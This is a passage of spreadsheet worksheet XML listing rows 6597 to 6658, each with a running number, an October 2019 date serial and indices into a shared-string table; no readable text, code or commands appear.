      <c r="G6597" t="s">
        <v>13025</v>
      </c>
    </row>
    <row r="6598" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6598">
        <f t="shared" si="103"/>
        <v>6597</v>
      </c>
      <c r="B6598">
        <v>1597</v>
      </c>
      <c r="C6598" t="s">
        <v>9973</v>
      </c>
      <c r="D6598" s="1">
        <v>43750</v>
      </c>
      <c r="E6598" t="s">
        <v>13026</v>
      </c>
      <c r="F6598" t="s">
        <v>9975</v>
      </c>
      <c r="G6598" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="6599" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6599">
        <f t="shared" si="103"/>
        <v>6598</v>
      </c>
      <c r="B6599">
        <v>1598</v>
      </c>
      <c r="C6599" t="s">
        <v>9973</v>
      </c>
      <c r="D6599" s="1">
        <v>43746</v>
      </c>
      <c r="E6599" t="s">
        <v>13028</v>
      </c>
      <c r="F6599" t="s">
        <v>9975</v>
      </c>
      <c r="G6599" t="s">
        <v>13029</v>
      </c>
    </row>
    <row r="6600" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6600">
        <f t="shared" si="103"/>
        <v>6599</v>
      </c>
      <c r="B6600">
        <v>1599</v>
      </c>
      <c r="C6600" t="s">
        <v>9973</v>
      </c>
      <c r="D6600" s="1">
        <v>43757</v>
      </c>
      <c r="E6600" t="s">
        <v>13030</v>
      </c>
      <c r="F6600" t="s">
        <v>9975</v>
      </c>
      <c r="G6600" t="s">
        <v>13031</v>
      </c>
    </row>
    <row r="6601" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6601">
        <f t="shared" si="103"/>
        <v>6600</v>
      </c>
      <c r="B6601">
        <v>1600</v>
      </c>
      <c r="C6601" t="s">
        <v>9973</v>
      </c>
      <c r="D6601" s="1">
        <v>43746</v>
      </c>
      <c r="E6601" t="s">
        <v>13032</v>
      </c>
      <c r="F6601" t="s">
        <v>9975</v>
      </c>
      <c r="G6601" t="s">
        <v>13033</v>
      </c>
    </row>
    <row r="6602" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6602">
        <f t="shared" si="103"/>
        <v>6601</v>
      </c>
      <c r="B6602">
        <v>1601</v>
      </c>
      <c r="C6602" t="s">
        <v>9973</v>
      </c>
      <c r="D6602" s="1">
        <v>43741</v>
      </c>
      <c r="E6602" t="s">
        <v>13034</v>
      </c>
      <c r="F6602" t="s">
        <v>9975</v>
      </c>
      <c r="G6602" t="s">
        <v>13035</v>
      </c>
    </row>
    <row r="6603" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6603">
        <f t="shared" si="103"/>
        <v>6602</v>
      </c>
      <c r="B6603">
        <v>1602</v>
      </c>
      <c r="C6603" t="s">
        <v>9973</v>
      </c>
      <c r="D6603" s="1">
        <v>43746</v>
      </c>
      <c r="E6603" t="s">
        <v>13036</v>
      </c>
      <c r="F6603" t="s">
        <v>9975</v>
      </c>
      <c r="G6603" t="s">
        <v>13037</v>
      </c>
    </row>
    <row r="6604" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6604">
        <f t="shared" si="103"/>
        <v>6603</v>
      </c>
      <c r="B6604">
        <v>1603</v>
      </c>
      <c r="C6604" t="s">
        <v>9973</v>
      </c>
      <c r="D6604" s="1">
        <v>43755</v>
      </c>
      <c r="E6604" t="s">
        <v>13038</v>
      </c>
      <c r="F6604" t="s">
        <v>9975</v>
      </c>
      <c r="G6604" t="s">
        <v>13039</v>
      </c>
    </row>
    <row r="6605" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6605">
        <f t="shared" si="103"/>
        <v>6604</v>
      </c>
      <c r="B6605">
        <v>1604</v>
      </c>
      <c r="C6605" t="s">
        <v>9973</v>
      </c>
      <c r="D6605" s="1">
        <v>43742</v>
      </c>
      <c r="E6605" t="s">
        <v>13040</v>
      </c>
      <c r="F6605" t="s">
        <v>9975</v>
      </c>
      <c r="G6605" t="s">
        <v>13041</v>
      </c>
    </row>
    <row r="6606" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6606">
        <f t="shared" si="103"/>
        <v>6605</v>
      </c>
      <c r="B6606">
        <v>1605</v>
      </c>
      <c r="C6606" t="s">
        <v>9973</v>
      </c>
      <c r="D6606" s="1">
        <v>43750</v>
      </c>
      <c r="E6606" t="s">
        <v>13042</v>
      </c>
      <c r="F6606" t="s">
        <v>9975</v>
      </c>
      <c r="G6606" t="s">
        <v>13043</v>
      </c>
    </row>
    <row r="6607" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6607">
        <f t="shared" si="103"/>
        <v>6606</v>
      </c>
      <c r="B6607">
        <v>1606</v>
      </c>
      <c r="C6607" t="s">
        <v>9973</v>
      </c>
      <c r="D6607" s="1">
        <v>43740</v>
      </c>
      <c r="E6607" t="s">
        <v>13044</v>
      </c>
      <c r="F6607" t="s">
        <v>9975</v>
      </c>
      <c r="G6607" t="s">
        <v>13045</v>
      </c>
    </row>
    <row r="6608" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6608">
        <f t="shared" si="103"/>
        <v>6607</v>
      </c>
      <c r="B6608">
        <v>1607</v>
      </c>
      <c r="C6608" t="s">
        <v>9973</v>
      </c>
      <c r="D6608" s="1">
        <v>43754</v>
      </c>
      <c r="E6608" t="s">
        <v>13046</v>
      </c>
      <c r="F6608" t="s">
        <v>9975</v>
      </c>
      <c r="G6608" t="s">
        <v>13047</v>
      </c>
    </row>
    <row r="6609" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6609">
        <f t="shared" si="103"/>
        <v>6608</v>
      </c>
      <c r="B6609">
        <v>1608</v>
      </c>
      <c r="C6609" t="s">
        <v>9973</v>
      </c>
      <c r="D6609" s="1">
        <v>43749</v>
      </c>
      <c r="E6609" t="s">
        <v>13048</v>
      </c>
      <c r="F6609" t="s">
        <v>9975</v>
      </c>
      <c r="G6609" t="s">
        <v>13049</v>
      </c>
    </row>
    <row r="6610" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6610">
        <f t="shared" si="103"/>
        <v>6609</v>
      </c>
      <c r="B6610">
        <v>1609</v>
      </c>
      <c r="C6610" t="s">
        <v>9973</v>
      </c>
      <c r="D6610" s="1">
        <v>43745</v>
      </c>
      <c r="E6610" t="s">
        <v>13050</v>
      </c>
      <c r="F6610" t="s">
        <v>9975</v>
      </c>
      <c r="G6610" t="s">
        <v>13051</v>
      </c>
    </row>
    <row r="6611" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6611">
        <f t="shared" si="103"/>
        <v>6610</v>
      </c>
      <c r="B6611">
        <v>1610</v>
      </c>
      <c r="C6611" t="s">
        <v>9973</v>
      </c>
      <c r="D6611" s="1">
        <v>43739</v>
      </c>
      <c r="E6611" t="s">
        <v>13052</v>
      </c>
      <c r="F6611" t="s">
        <v>9975</v>
      </c>
      <c r="G6611" t="s">
        <v>13053</v>
      </c>
    </row>
    <row r="6612" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6612">
        <f t="shared" si="103"/>
        <v>6611</v>
      </c>
      <c r="B6612">
        <v>1611</v>
      </c>
      <c r="C6612" t="s">
        <v>9973</v>
      </c>
      <c r="D6612" s="1">
        <v>43754</v>
      </c>
      <c r="E6612" t="s">
        <v>13054</v>
      </c>
      <c r="F6612" t="s">
        <v>9975</v>
      </c>
      <c r="G6612" t="s">
        <v>13055</v>
      </c>
    </row>
    <row r="6613" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6613">
        <f t="shared" si="103"/>
        <v>6612</v>
      </c>
      <c r="B6613">
        <v>1612</v>
      </c>
      <c r="C6613" t="s">
        <v>9973</v>
      </c>
      <c r="D6613" s="1">
        <v>43741</v>
      </c>
      <c r="E6613" t="s">
        <v>13056</v>
      </c>
      <c r="F6613" t="s">
        <v>9975</v>
      </c>
      <c r="G6613" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="6614" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6614">
        <f t="shared" si="103"/>
        <v>6613</v>
      </c>
      <c r="B6614">
        <v>1613</v>
      </c>
      <c r="C6614" t="s">
        <v>9973</v>
      </c>
      <c r="D6614" s="1">
        <v>43742</v>
      </c>
      <c r="E6614" t="s">
        <v>13058</v>
      </c>
      <c r="F6614" t="s">
        <v>9975</v>
      </c>
      <c r="G6614" t="s">
        <v>13059</v>
      </c>
    </row>
    <row r="6615" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6615">
        <f t="shared" si="103"/>
        <v>6614</v>
      </c>
      <c r="B6615">
        <v>1614</v>
      </c>
      <c r="C6615" t="s">
        <v>9973</v>
      </c>
      <c r="D6615" s="1">
        <v>43756</v>
      </c>
      <c r="E6615" t="s">
        <v>10099</v>
      </c>
      <c r="F6615" t="s">
        <v>9975</v>
      </c>
      <c r="G6615" t="s">
        <v>13060</v>
      </c>
    </row>
    <row r="6616" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6616">
        <f t="shared" si="103"/>
        <v>6615</v>
      </c>
      <c r="B6616">
        <v>1615</v>
      </c>
      <c r="C6616" t="s">
        <v>9973</v>
      </c>
      <c r="D6616" s="1">
        <v>43746</v>
      </c>
      <c r="E6616" t="s">
        <v>13061</v>
      </c>
      <c r="F6616" t="s">
        <v>10021</v>
      </c>
      <c r="G6616" t="s">
        <v>13062</v>
      </c>
    </row>
    <row r="6617" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6617">
        <f t="shared" si="103"/>
        <v>6616</v>
      </c>
      <c r="B6617">
        <v>1616</v>
      </c>
      <c r="C6617" t="s">
        <v>9973</v>
      </c>
      <c r="D6617" s="1">
        <v>43748</v>
      </c>
      <c r="E6617" t="s">
        <v>13063</v>
      </c>
      <c r="F6617" t="s">
        <v>10526</v>
      </c>
      <c r="G6617" t="s">
        <v>13064</v>
      </c>
    </row>
    <row r="6618" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6618">
        <f t="shared" si="103"/>
        <v>6617</v>
      </c>
      <c r="B6618">
        <v>1617</v>
      </c>
      <c r="C6618" t="s">
        <v>9973</v>
      </c>
      <c r="D6618" s="1">
        <v>43742</v>
      </c>
      <c r="E6618" t="s">
        <v>13065</v>
      </c>
      <c r="F6618" t="s">
        <v>9975</v>
      </c>
      <c r="G6618" t="s">
        <v>13066</v>
      </c>
    </row>
    <row r="6619" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6619">
        <f t="shared" si="103"/>
        <v>6618</v>
      </c>
      <c r="B6619">
        <v>1618</v>
      </c>
      <c r="C6619" t="s">
        <v>9973</v>
      </c>
      <c r="D6619" s="1">
        <v>43741</v>
      </c>
      <c r="E6619" t="s">
        <v>13067</v>
      </c>
      <c r="F6619" t="s">
        <v>9975</v>
      </c>
      <c r="G6619" t="s">
        <v>13068</v>
      </c>
    </row>
    <row r="6620" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6620">
        <f t="shared" si="103"/>
        <v>6619</v>
      </c>
      <c r="B6620">
        <v>1619</v>
      </c>
      <c r="C6620" t="s">
        <v>9973</v>
      </c>
      <c r="D6620" s="1">
        <v>43757</v>
      </c>
      <c r="E6620" t="s">
        <v>13069</v>
      </c>
      <c r="F6620" t="s">
        <v>9975</v>
      </c>
      <c r="G6620" t="s">
        <v>13070</v>
      </c>
    </row>
    <row r="6621" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6621">
        <f t="shared" si="103"/>
        <v>6620</v>
      </c>
      <c r="B6621">
        <v>1620</v>
      </c>
      <c r="C6621" t="s">
        <v>9973</v>
      </c>
      <c r="D6621" s="1">
        <v>43746</v>
      </c>
      <c r="E6621" t="s">
        <v>13071</v>
      </c>
      <c r="F6621" t="s">
        <v>9975</v>
      </c>
      <c r="G6621" t="s">
        <v>13072</v>
      </c>
    </row>
    <row r="6622" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6622">
        <f t="shared" si="103"/>
        <v>6621</v>
      </c>
      <c r="B6622">
        <v>1621</v>
      </c>
      <c r="C6622" t="s">
        <v>9973</v>
      </c>
      <c r="D6622" s="1">
        <v>43744</v>
      </c>
      <c r="E6622" t="s">
        <v>13073</v>
      </c>
      <c r="F6622" t="s">
        <v>9975</v>
      </c>
      <c r="G6622" t="s">
        <v>13074</v>
      </c>
    </row>
    <row r="6623" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6623">
        <f t="shared" si="103"/>
        <v>6622</v>
      </c>
      <c r="B6623">
        <v>1622</v>
      </c>
      <c r="C6623" t="s">
        <v>9973</v>
      </c>
      <c r="D6623" s="1">
        <v>43753</v>
      </c>
      <c r="E6623" t="s">
        <v>13075</v>
      </c>
      <c r="F6623" t="s">
        <v>9975</v>
      </c>
      <c r="G6623" t="s">
        <v>13076</v>
      </c>
    </row>
    <row r="6624" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6624">
        <f t="shared" si="103"/>
        <v>6623</v>
      </c>
      <c r="B6624">
        <v>1623</v>
      </c>
      <c r="C6624" t="s">
        <v>9973</v>
      </c>
      <c r="D6624" s="1">
        <v>43752</v>
      </c>
      <c r="E6624" t="s">
        <v>13077</v>
      </c>
      <c r="F6624" t="s">
        <v>9975</v>
      </c>
      <c r="G6624" t="s">
        <v>13078</v>
      </c>
    </row>
    <row r="6625" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6625">
        <f t="shared" si="103"/>
        <v>6624</v>
      </c>
      <c r="B6625">
        <v>1624</v>
      </c>
      <c r="C6625" t="s">
        <v>9973</v>
      </c>
      <c r="D6625" s="1">
        <v>43756</v>
      </c>
      <c r="E6625" t="s">
        <v>13079</v>
      </c>
      <c r="F6625" t="s">
        <v>9975</v>
      </c>
      <c r="G6625" t="s">
        <v>13080</v>
      </c>
    </row>
    <row r="6626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6626">
        <f t="shared" si="103"/>
        <v>6625</v>
      </c>
      <c r="B6626">
        <v>1625</v>
      </c>
      <c r="C6626" t="s">
        <v>9973</v>
      </c>
      <c r="D6626" s="1">
        <v>43741</v>
      </c>
      <c r="E6626" t="s">
        <v>13081</v>
      </c>
      <c r="F6626" t="s">
        <v>9975</v>
      </c>
      <c r="G6626" t="s">
        <v>13082</v>
      </c>
    </row>
    <row r="6627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6627">
        <f t="shared" si="103"/>
        <v>6626</v>
      </c>
      <c r="B6627">
        <v>1626</v>
      </c>
      <c r="C6627" t="s">
        <v>9973</v>
      </c>
      <c r="D6627" s="1">
        <v>43746</v>
      </c>
      <c r="E6627" t="s">
        <v>13083</v>
      </c>
      <c r="F6627" t="s">
        <v>9975</v>
      </c>
      <c r="G6627" t="s">
        <v>13084</v>
      </c>
    </row>
    <row r="6628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6628">
        <f t="shared" si="103"/>
        <v>6627</v>
      </c>
      <c r="B6628">
        <v>1627</v>
      </c>
      <c r="C6628" t="s">
        <v>9973</v>
      </c>
      <c r="D6628" s="1">
        <v>43739</v>
      </c>
      <c r="E6628" t="s">
        <v>13085</v>
      </c>
      <c r="F6628" t="s">
        <v>9975</v>
      </c>
      <c r="G6628" t="s">
        <v>13086</v>
      </c>
    </row>
    <row r="6629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6629">
        <f t="shared" si="103"/>
        <v>6628</v>
      </c>
      <c r="B6629">
        <v>1628</v>
      </c>
      <c r="C6629" t="s">
        <v>9973</v>
      </c>
      <c r="D6629" s="1">
        <v>43743</v>
      </c>
      <c r="E6629" t="s">
        <v>13087</v>
      </c>
      <c r="F6629" t="s">
        <v>9975</v>
      </c>
      <c r="G6629" t="s">
        <v>13088</v>
      </c>
    </row>
    <row r="6630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6630">
        <f t="shared" si="103"/>
        <v>6629</v>
      </c>
      <c r="B6630">
        <v>1629</v>
      </c>
      <c r="C6630" t="s">
        <v>9973</v>
      </c>
      <c r="D6630" s="1">
        <v>43755</v>
      </c>
      <c r="E6630" t="s">
        <v>13089</v>
      </c>
      <c r="F6630" t="s">
        <v>9975</v>
      </c>
      <c r="G6630" t="s">
        <v>13090</v>
      </c>
    </row>
    <row r="6631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6631">
        <f t="shared" si="103"/>
        <v>6630</v>
      </c>
      <c r="B6631">
        <v>1630</v>
      </c>
      <c r="C6631" t="s">
        <v>9973</v>
      </c>
      <c r="D6631" s="1">
        <v>43755</v>
      </c>
      <c r="E6631" t="s">
        <v>13091</v>
      </c>
      <c r="F6631" t="s">
        <v>9975</v>
      </c>
      <c r="G6631" t="s">
        <v>13092</v>
      </c>
    </row>
    <row r="6632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6632">
        <f t="shared" si="103"/>
        <v>6631</v>
      </c>
      <c r="B6632">
        <v>1631</v>
      </c>
      <c r="C6632" t="s">
        <v>9973</v>
      </c>
      <c r="D6632" s="1">
        <v>43755</v>
      </c>
      <c r="E6632" t="s">
        <v>13093</v>
      </c>
      <c r="F6632" t="s">
        <v>9975</v>
      </c>
      <c r="G6632" t="s">
        <v>13094</v>
      </c>
    </row>
    <row r="6633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6633">
        <f t="shared" si="103"/>
        <v>6632</v>
      </c>
      <c r="B6633">
        <v>1632</v>
      </c>
      <c r="C6633" t="s">
        <v>9973</v>
      </c>
      <c r="D6633" s="1">
        <v>43741</v>
      </c>
      <c r="E6633" t="s">
        <v>13095</v>
      </c>
      <c r="F6633" t="s">
        <v>9975</v>
      </c>
      <c r="G6633" t="s">
        <v>13096</v>
      </c>
    </row>
    <row r="6634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6634">
        <f t="shared" si="103"/>
        <v>6633</v>
      </c>
      <c r="B6634">
        <v>1633</v>
      </c>
      <c r="C6634" t="s">
        <v>9973</v>
      </c>
      <c r="D6634" s="1">
        <v>43749</v>
      </c>
      <c r="E6634" t="s">
        <v>13097</v>
      </c>
      <c r="F6634" t="s">
        <v>9975</v>
      </c>
      <c r="G6634" t="s">
        <v>13098</v>
      </c>
    </row>
    <row r="6635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6635">
        <f t="shared" si="103"/>
        <v>6634</v>
      </c>
      <c r="B6635">
        <v>1634</v>
      </c>
      <c r="C6635" t="s">
        <v>9973</v>
      </c>
      <c r="D6635" s="1">
        <v>43739</v>
      </c>
      <c r="E6635" t="s">
        <v>13099</v>
      </c>
      <c r="F6635" t="s">
        <v>9975</v>
      </c>
      <c r="G6635" t="s">
        <v>13100</v>
      </c>
    </row>
    <row r="6636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6636">
        <f t="shared" si="103"/>
        <v>6635</v>
      </c>
      <c r="B6636">
        <v>1635</v>
      </c>
      <c r="C6636" t="s">
        <v>9973</v>
      </c>
      <c r="D6636" s="1">
        <v>43744</v>
      </c>
      <c r="E6636" t="s">
        <v>10351</v>
      </c>
      <c r="F6636" t="s">
        <v>9975</v>
      </c>
    </row>
    <row r="6637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6637">
        <f t="shared" si="103"/>
        <v>6636</v>
      </c>
      <c r="B6637">
        <v>1636</v>
      </c>
      <c r="C6637" t="s">
        <v>9973</v>
      </c>
      <c r="D6637" s="1">
        <v>43742</v>
      </c>
      <c r="E6637" t="s">
        <v>13101</v>
      </c>
      <c r="F6637" t="s">
        <v>9975</v>
      </c>
      <c r="G6637" t="s">
        <v>13102</v>
      </c>
    </row>
    <row r="6638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6638">
        <f t="shared" si="103"/>
        <v>6637</v>
      </c>
      <c r="B6638">
        <v>1637</v>
      </c>
      <c r="C6638" t="s">
        <v>9973</v>
      </c>
      <c r="D6638" s="1">
        <v>43740</v>
      </c>
      <c r="E6638" t="s">
        <v>13103</v>
      </c>
      <c r="F6638" t="s">
        <v>9975</v>
      </c>
      <c r="G6638" t="s">
        <v>13104</v>
      </c>
    </row>
    <row r="6639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6639">
        <f t="shared" si="103"/>
        <v>6638</v>
      </c>
      <c r="B6639">
        <v>1638</v>
      </c>
      <c r="C6639" t="s">
        <v>9973</v>
      </c>
      <c r="D6639" s="1">
        <v>43747</v>
      </c>
      <c r="E6639" t="s">
        <v>13105</v>
      </c>
      <c r="F6639" t="s">
        <v>9975</v>
      </c>
      <c r="G6639" t="s">
        <v>13106</v>
      </c>
    </row>
    <row r="6640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6640">
        <f t="shared" si="103"/>
        <v>6639</v>
      </c>
      <c r="B6640">
        <v>1639</v>
      </c>
      <c r="C6640" t="s">
        <v>9973</v>
      </c>
      <c r="D6640" s="1">
        <v>43752</v>
      </c>
      <c r="E6640" t="s">
        <v>13107</v>
      </c>
      <c r="F6640" t="s">
        <v>9975</v>
      </c>
      <c r="G6640" t="s">
        <v>13108</v>
      </c>
    </row>
    <row r="6641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6641">
        <f t="shared" si="103"/>
        <v>6640</v>
      </c>
      <c r="B6641">
        <v>1640</v>
      </c>
      <c r="C6641" t="s">
        <v>9973</v>
      </c>
      <c r="D6641" s="1">
        <v>43740</v>
      </c>
      <c r="E6641" t="s">
        <v>13109</v>
      </c>
      <c r="F6641" t="s">
        <v>9975</v>
      </c>
      <c r="G6641" t="s">
        <v>13110</v>
      </c>
    </row>
    <row r="6642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6642">
        <f t="shared" si="103"/>
        <v>6641</v>
      </c>
      <c r="B6642">
        <v>1641</v>
      </c>
      <c r="C6642" t="s">
        <v>9973</v>
      </c>
      <c r="D6642" s="1">
        <v>43755</v>
      </c>
      <c r="E6642" t="s">
        <v>13111</v>
      </c>
      <c r="F6642" t="s">
        <v>9975</v>
      </c>
      <c r="G6642" t="s">
        <v>13112</v>
      </c>
    </row>
    <row r="6643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6643">
        <f t="shared" si="103"/>
        <v>6642</v>
      </c>
      <c r="B6643">
        <v>1642</v>
      </c>
      <c r="C6643" t="s">
        <v>9973</v>
      </c>
      <c r="D6643" s="1">
        <v>43746</v>
      </c>
      <c r="E6643" t="s">
        <v>13113</v>
      </c>
      <c r="F6643" t="s">
        <v>9975</v>
      </c>
      <c r="G6643" t="s">
        <v>13114</v>
      </c>
    </row>
    <row r="6644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6644">
        <f t="shared" si="103"/>
        <v>6643</v>
      </c>
      <c r="B6644">
        <v>1643</v>
      </c>
      <c r="C6644" t="s">
        <v>9973</v>
      </c>
      <c r="D6644" s="1">
        <v>43752</v>
      </c>
      <c r="E6644" t="s">
        <v>13115</v>
      </c>
      <c r="F6644" t="s">
        <v>9975</v>
      </c>
      <c r="G6644" t="s">
        <v>13116</v>
      </c>
    </row>
    <row r="6645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6645">
        <f t="shared" si="103"/>
        <v>6644</v>
      </c>
      <c r="B6645">
        <v>1644</v>
      </c>
      <c r="C6645" t="s">
        <v>9973</v>
      </c>
      <c r="D6645" s="1">
        <v>43752</v>
      </c>
      <c r="E6645" t="s">
        <v>10099</v>
      </c>
      <c r="F6645" t="s">
        <v>9975</v>
      </c>
      <c r="G6645" t="s">
        <v>13117</v>
      </c>
    </row>
    <row r="6646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6646">
        <f t="shared" si="103"/>
        <v>6645</v>
      </c>
      <c r="B6646">
        <v>1645</v>
      </c>
      <c r="C6646" t="s">
        <v>9973</v>
      </c>
      <c r="D6646" s="1">
        <v>43755</v>
      </c>
      <c r="E6646" t="s">
        <v>13118</v>
      </c>
      <c r="F6646" t="s">
        <v>9975</v>
      </c>
      <c r="G6646" t="s">
        <v>13119</v>
      </c>
    </row>
    <row r="6647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6647">
        <f t="shared" si="103"/>
        <v>6646</v>
      </c>
      <c r="B6647">
        <v>1646</v>
      </c>
      <c r="C6647" t="s">
        <v>9973</v>
      </c>
      <c r="D6647" s="1">
        <v>43742</v>
      </c>
      <c r="E6647" t="s">
        <v>13120</v>
      </c>
      <c r="F6647" t="s">
        <v>9975</v>
      </c>
      <c r="G6647" t="s">
        <v>13121</v>
      </c>
    </row>
    <row r="6648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6648">
        <f t="shared" si="103"/>
        <v>6647</v>
      </c>
      <c r="B6648">
        <v>1647</v>
      </c>
      <c r="C6648" t="s">
        <v>9973</v>
      </c>
      <c r="D6648" s="1">
        <v>43739</v>
      </c>
      <c r="E6648" t="s">
        <v>13122</v>
      </c>
      <c r="F6648" t="s">
        <v>9975</v>
      </c>
      <c r="G6648" t="s">
        <v>13123</v>
      </c>
    </row>
    <row r="6649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6649">
        <f t="shared" si="103"/>
        <v>6648</v>
      </c>
      <c r="B6649">
        <v>1648</v>
      </c>
      <c r="C6649" t="s">
        <v>9973</v>
      </c>
      <c r="D6649" s="1">
        <v>43755</v>
      </c>
      <c r="E6649" t="s">
        <v>13124</v>
      </c>
      <c r="F6649" t="s">
        <v>9975</v>
      </c>
      <c r="G6649" t="s">
        <v>13125</v>
      </c>
    </row>
    <row r="6650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6650">
        <f t="shared" si="103"/>
        <v>6649</v>
      </c>
      <c r="B6650">
        <v>1649</v>
      </c>
      <c r="C6650" t="s">
        <v>9973</v>
      </c>
      <c r="D6650" s="1">
        <v>43747</v>
      </c>
      <c r="E6650" t="s">
        <v>13126</v>
      </c>
      <c r="F6650" t="s">
        <v>9975</v>
      </c>
      <c r="G6650" t="s">
        <v>13127</v>
      </c>
    </row>
    <row r="6651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6651">
        <f t="shared" si="103"/>
        <v>6650</v>
      </c>
      <c r="B6651">
        <v>1650</v>
      </c>
      <c r="C6651" t="s">
        <v>9973</v>
      </c>
      <c r="D6651" s="1">
        <v>43740</v>
      </c>
      <c r="E6651" t="s">
        <v>10099</v>
      </c>
      <c r="F6651" t="s">
        <v>9975</v>
      </c>
      <c r="G6651" t="s">
        <v>13128</v>
      </c>
    </row>
    <row r="6652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6652">
        <f t="shared" si="103"/>
        <v>6651</v>
      </c>
      <c r="B6652">
        <v>1651</v>
      </c>
      <c r="C6652" t="s">
        <v>9973</v>
      </c>
      <c r="D6652" s="1">
        <v>43740</v>
      </c>
      <c r="E6652" t="s">
        <v>13129</v>
      </c>
      <c r="F6652" t="s">
        <v>10526</v>
      </c>
      <c r="G6652" t="s">
        <v>13130</v>
      </c>
    </row>
    <row r="6653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6653">
        <f t="shared" si="103"/>
        <v>6652</v>
      </c>
      <c r="B6653">
        <v>1652</v>
      </c>
      <c r="C6653" t="s">
        <v>9973</v>
      </c>
      <c r="D6653" s="1">
        <v>43740</v>
      </c>
      <c r="E6653" t="s">
        <v>13131</v>
      </c>
      <c r="F6653" t="s">
        <v>9975</v>
      </c>
      <c r="G6653" t="s">
        <v>13132</v>
      </c>
    </row>
    <row r="6654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6654">
        <f t="shared" si="103"/>
        <v>6653</v>
      </c>
      <c r="B6654">
        <v>1653</v>
      </c>
      <c r="C6654" t="s">
        <v>9973</v>
      </c>
      <c r="D6654" s="1">
        <v>43747</v>
      </c>
      <c r="E6654" t="s">
        <v>13133</v>
      </c>
      <c r="F6654" t="s">
        <v>9975</v>
      </c>
      <c r="G6654" t="s">
        <v>13134</v>
      </c>
    </row>
    <row r="6655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6655">
        <f t="shared" si="103"/>
        <v>6654</v>
      </c>
      <c r="B6655">
        <v>1654</v>
      </c>
      <c r="C6655" t="s">
        <v>9973</v>
      </c>
      <c r="D6655" s="1">
        <v>43743</v>
      </c>
      <c r="E6655" t="s">
        <v>13135</v>
      </c>
      <c r="F6655" t="s">
        <v>9975</v>
      </c>
      <c r="G6655" t="s">
        <v>13136</v>
      </c>
    </row>
    <row r="6656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6656">
        <f t="shared" si="103"/>
        <v>6655</v>
      </c>
      <c r="B6656">
        <v>1655</v>
      </c>
      <c r="C6656" t="s">
        <v>9973</v>
      </c>
      <c r="D6656" s="1">
        <v>43740</v>
      </c>
      <c r="E6656" t="s">
        <v>13137</v>
      </c>
      <c r="F6656" t="s">
        <v>9975</v>
      </c>
      <c r="G6656" t="s">
        <v>13138</v>
      </c>
    </row>
    <row r="6657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6657">
        <f t="shared" si="103"/>
        <v>6656</v>
      </c>
      <c r="B6657">
        <v>1656</v>
      </c>
      <c r="C6657" t="s">
        <v>9973</v>
      </c>
      <c r="D6657" s="1">
        <v>43741</v>
      </c>
      <c r="E6657" t="s">
        <v>13139</v>
      </c>
      <c r="F6657" t="s">
        <v>9975</v>
      </c>
      <c r="G6657" t="s">
        <v>13140</v>
      </c>
    </row>
    <row r="6658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6658">
        <f t="shared" si="103"/>
        <v>6657</v>
      </c>
      <c r="B6658">
        <v>1657</v>
      </c>
      <c r="C6658" t="s">
        <v>9973</v>
      </c>
      <c r="D6658" s="1">
        <v>43741</v>
      </c>
      <c r="E6658" t="s">
        <v>13141</v>
      </c>
      <c r="F6658" t="s">
        <v>9975</v>
      </c>
      <c r="G6658" t="s">
